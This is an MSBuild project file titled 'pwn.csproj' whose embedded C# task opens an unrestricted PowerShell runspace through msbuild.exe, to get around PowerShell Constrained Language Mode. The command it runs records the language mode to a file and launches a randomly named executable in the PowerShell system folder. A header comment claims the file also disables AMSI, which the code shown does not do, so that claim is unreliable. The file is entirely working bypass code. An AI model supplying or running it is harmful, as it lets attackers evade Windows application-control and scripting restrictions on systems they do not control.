<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
         <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe pwn.csproj -->
         <!-- Bypass CLM and disables AMSI -->
         <!-- Author: Casey Smith, Twitter: @subTee -->
         <!-- License: BSD 3-Clause -->
  <Target Name="Bypass">
   <BypassCLM/>
  </Target>
   <UsingTask
    TaskName="BypassCLM"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
     <Task>
      <Reference Include="System.Management.Automation" />		
      <Code Type="Class" Language="cs">
      <![CDATA[
			using System;
			using System.IO;
			using Microsoft.Build.Framework;
			using Microsoft.Build.Utilities;
			using System.ComponentModel;
			using System.Collections.Generic;
			using System.Collections.ObjectModel;
			using System.Runtime.InteropServices;
			using System.Management.Automation;
			using System.Management.Automation.Runspaces;


      public class BypassCLM : Task, ITask
      {

          public override bool Execute()
          {
                Runspace run = RunspaceFactory.CreateRunspace();
                run.Open();

                PowerShell shell = PowerShell.Create();
                shell.Runspace = run;

                String command = "$ExecutionContext.SessionState.LanguageMode > check-languagemode.txt; C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\qsdrlm42tgbfk.exe /c echo ok > ok.txt";
                shell.AddScript(command);

                shell.Invoke();

                run.Close();
  
            
              return true;

          }
       }
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
